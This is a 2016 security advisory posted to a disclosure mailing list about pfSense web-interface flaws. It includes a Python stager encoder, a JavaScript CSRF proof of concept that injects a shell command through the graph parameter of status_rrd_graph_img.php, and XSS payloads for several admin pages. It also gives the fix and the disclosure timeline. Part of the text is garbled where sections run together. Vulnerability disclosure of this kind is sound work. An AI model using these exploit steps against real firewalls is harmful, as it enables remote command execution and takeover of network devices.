Date: Fri, 15 Apr 2016 14:54:55 +1200
From: Francesco Oddo
To:
Subject: [FD] PfSense Community Edition Multiple Vulnerabilities
Content-Type: text/plain; charset="utf-8"
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ __ ___
\__ \==/ /_\ \ _/ _\/ _ \ / \
/ \/ | \\ \__( ) Y Y \
/__ /\_| / \_ >/||_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_="=.
presents..
PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition \' > shellexec')encoded_stager = ''for c in stager: encoded_stager += "\\\\%03d" %(int(oct(ord(c))))print encoded_stager
[CSRF POC]
function sploit() { var query = "database=-throughput.rrd&graph=file|printf[ENCODED_STAGER]|sh|echo "; var xhr = new XMLHttpRequest(); xhr.open("GET", "/status_rrd_graph_img.php?" +query, true); xhr.withCredentials = true; xhr.send(); setTimeout(shellexec, 2000); } function shellexec() { document.csrf_exploit_exec.submit(); }
Cross-site Scripting
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users? session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).
Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => alert(1)
Render => /system_gateways_groups_edit.php
Type => Stored
Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => ">alert(1)
Render => /firewall_shaper_layer7.php
Type => Reflected
Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => ">alert(1)
Render => /firewall_shaper_vinterface.php
Type => Reflected
+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.
+------------+
| Timeline |
+------------+
10/02/2016 ? Initial disclosure to pfSense.
11/02/2016 ? Vendor confirms receipt of advisory and provides fixes.
16/02/1016 ? Sent follow up email about public release.
16/02/2016 ? Vendor requests advisory disclosure after release of new
software build.
12/04/2016 ? Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 ? Public disclosure of security advisory.
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
+------------+
| References |
+------------+
pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc